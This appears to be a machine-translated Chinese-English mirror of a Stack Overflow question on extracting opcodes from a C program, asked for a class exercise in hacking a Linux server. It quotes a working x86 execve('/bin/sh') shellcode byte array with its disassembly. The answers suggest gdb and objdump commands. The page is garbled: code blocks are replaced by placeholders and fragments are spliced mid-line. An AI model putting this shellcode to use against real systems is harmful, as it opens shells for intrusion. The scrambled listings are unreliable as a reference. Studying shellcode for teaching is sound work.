Linux 如何获取ac程序的操作码
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/9813027/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
How to get opcodes of a c program
提问by George Panic
I know how to get the assembly code of my program using gdb but how do I get the opcode? I need it to hack a linux server (don't worry it's part of a class I'm having so no real server will be harmed). Actually I was reading thisarticle and I'm wondering how can I get from assembly:
我知道如何使用 gdb 获取程序的汇编代码,但如何获取操作码?我需要它来破解 linux 服务器(不要担心它是我所拥有的课程的一部分,因此不会损害真正的服务器)。实际上我正在阅读这篇文章,我想知道如何从汇编中获得:
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>: pushl %ebp
0x8000131 <main+1>: movl %esp,%ebp
0x8000133 <main+3>: jmp 0x800015f <main+47>
0x8000135 <main+5>: popl %esi
0x8000136 <main+6>: movl %esi,0x8(%esi)
0x8000139 <main+9>: movb testsc.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
x0,0x7(%esi)
0x800013d <main+13>: movl Disassembly of section .data:
00000000 <shellcode>:
0: eb 2a jmp 2c <shellcode+0x2c>
2: 5e pop %esi
3: 89 76 08 mov %esi,0x8(%esi)
6: c6 46 07 00 movb gcc testsc.c -c
x0,0x7(%esi)
a: c7 46 0c 00 00 00 00 movl objdump -D testsc.o
x0,0xc(%esi)
11: b8 0b 00 00 00 mov gcc -S -c tst.c -o -
xb,%eax
16: 89 f3 mov %esi,%ebx
18: 8d 4e 08 lea 0x8(%esi),%ecx
1b: 8d 56 0c lea 0xc(%esi),%edx
1e: cd 80 int gcc -g -ggdb -c tst.c
objdump -S tst.o
x80
20: b8 01 00 00 00 mov gcc -c tst.c
objdump -D -j .data tst.o
x1,%eax
25: bb 00 00 00 00 mov .text
.byte 0xeb, 0x2a, 0x5e, ..
x0,%ebx
2a: cd 80 int ##代码##x80
2c: e8 d1 ff ff ff call 2 <shellcode+0x2>
31: 2f das
32: 62 69 6e bound %ebp,0x6e(%ecx)
35: 2f das
36: 73 68 jae a0 <shellcode+0xa0>
38: 00 89 ec 5d c3 00 add %cl,0xc35dec(%ecx)
x0,0xc(%esi)
0x8000144 <main+20>: movl ##代码##xb,%eax
0x8000149 <main+25>: movl %esi,%ebx
0x800014b <main+27>: leal 0x8(%esi),%ecx
0x800014e <main+30>: leal 0xc(%esi),%edx
0x8000151 <main+33>: int ##代码##x80
0x8000153 <main+35>: movl ##代码##x1,%eax
0x8000158 <main+40>: movl ##代码##x0,%ebx
0x800015d <main+45>: int ##代码##x80
0x800015f <main+47>: call 0x8000135 <main+5>
0x8000164 <main+52>: das
0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>: das
0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>
0x800016b <main+59>: addb %cl,0x55c35dec(%ecx)
End of assembler dump.
the following:
下列:
##代码##The system is linux x86 and the language I will be using C. I'd really like an automated way, but a manual solution would work too.
系统是 linux x86,我将使用 C 语言。我真的很喜欢自动化方式,但手动解决方案也可以。
I mean how do I convert %ebp, %esi, %esp etc.. Is there a map I can use? or an automated programm?
我的意思是如何转换 %ebp、%esi、%esp 等。有我可以使用的地图吗?或自动程序?
采纳答案by George Panic
Found it! First disassemble then type : x/bx hit enter and get one by one the hex representation of the assembly commands!
找到了!首先反汇编然后键入:x/bx 按回车键并一一得到汇编命令的十六进制表示!
回答by Kaz
Here you go:
干得好:
##代码##Note how the last 00 in that add %clinstruction comes from the string null terminator byte; it is not explicit.
请注意该add %cl指令中的最后一个 00 如何来自字符串空终止符字节;它不明确。
How I got this was that I simply compiled your declaration with
我是如何得到这个的,因为我只是用
##代码##and then
进而
##代码##回答by ouah
You can use:
您可以使用:
##代码##or
或者
##代码##to get the disassembly of your program with the opcodes.
使用操作码对程序进行反汇编。
To get the disassembly of your char array, you can use:
要对 char 数组进行反汇编,您可以使用:
##代码##回答by zvrba
Create a small assembly file, say code.s. Then put the following inside:
创建一个小的程序集文件,比如code.s. 然后在里面放入以下内容:
Assemble it with as code.s -o code.oand use objdump to disassemble the result.
将其组装as code.s -o code.o并使用 objdump 反汇编结果。
